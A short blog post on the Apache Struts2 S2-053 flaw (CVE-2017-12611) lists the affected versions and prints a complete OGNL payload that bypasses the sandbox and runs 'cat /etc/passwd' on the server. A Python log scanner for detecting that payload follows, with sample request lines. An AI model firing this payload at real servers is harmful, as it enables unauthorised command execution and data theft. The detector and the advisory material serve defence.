
Published on June 3rd, 2018


Exploit CVE-2017-12611: Apache Struts2 (S2-053) remote code execution vulnerability



What is CVE-2017-12611?

When expression literals are used, or expression evaluation is forced, in Freemarker tags whose values come from the request, RCE attacks are possible. The value attribute of Freemarker tags should not be initialized from literals or expressions that can be modified by the request, because Freemarker will treat them as expressions, leading to possible remote code execution.

Affected versions:

  • Struts 2.0.1 – Struts 2.3.33
  • Struts 2.5 – Struts 2.5.10

Unaffected versions:

  • Struts 2.3.34
  • Struts 2.5.12

For how to fix it, please read this post.






Exploit

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
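A detection-side example, added here and not part of the original post: it scans web-server log lines for the OGNL fragments that make up the payload above (sandbox override, excluded-class clearing, ProcessBuilder) and raises an alert when enough of them appear in one request. The log format, the trailing quoted POST-body field, the weights and the sample lines are all constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Fragments characteristic of the S2-053 OGNL payload, each with a constructed
# weight (a scoring choice for this example, not a Struts or OGNL property).
OGNL_INDICATORS = [
    (re.compile(r"%\{"), 1),                                  # forced OGNL expression
    (re.compile(r"@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS"), 3),
    (re.compile(r"#_memberAccess"), 2),                       # sandbox override
    (re.compile(r"getExcludedPackageNames\(\)\.clear\(\)"), 3),
    (re.compile(r"getExcludedClasses\(\)\.clear\(\)"), 3),
    (re.compile(r"java\.lang\.ProcessBuilder"), 3),           # command execution
    (re.compile(r"@java\.lang\.System@getProperty"), 1),
    (re.compile(r"@org\.apache\.commons\.io\.IOUtils@toString"), 2),
]

# Combined-log style line with an optional trailing quoted POST body (assumed
# to be written by a request-logging filter; the field is a constructed convention).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+(?: "(?P<body>[^"]*)")?$'
)

def score_request(decoded):
    """Return (total weight, matched patterns) for one URL-decoded request."""
    matched = [(p, w) for p, w in OGNL_INDICATORS if p.search(decoded)]
    return sum(w for _, w in matched), [p.pattern for p, _ in matched]

def scan_log(lines, threshold=4):
    """Flag requests whose query string or body scores at or above threshold."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        raw = m["target"] + " " + (m["body"] or "")
        # Decode twice so a double-encoded payload is normalised before matching.
        total, hits = score_request(unquote_plus(unquote_plus(raw)))
        if total >= threshold:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                           "score": total, "hits": hits})
    return alerts

# Constructed sample log lines: benign GET, S2-053 style GET, a benign "%{" false
# positive candidate that stays under the threshold, and a POST carrying the payload in the body.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jun/2018:10:15:01 +0000] "GET /app/login.action?redirectUri=%2Fhome HTTP/1.1" 200 512',
    '10.0.0.9 - - [03/Jun/2018:10:15:07 +0000] "GET /app/login.action?redirectUri=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3D%23dm%29%7D HTTP/1.1" 500 88',
    '10.0.0.7 - - [03/Jun/2018:10:16:30 +0000] "GET /app/search.action?q=%25%7Bcount%7D HTTP/1.1" 200 2048',
    '10.0.0.9 - - [03/Jun/2018:10:17:02 +0000] "POST /app/login.action HTTP/1.1" 500 88 "redirectUri=%25%7B%28%23_memberAccess%3D%23dm%29.%28%40java.lang.System%40getProperty%28%27os.name%27%29%29%7D"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A lone `%{` in a parameter scores 1 and is not reported at the default threshold; the point is that the sandbox-override and execution fragments only ever occur together in an attack, so requiring several of them keeps the rule quiet on normal traffic.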

Demo


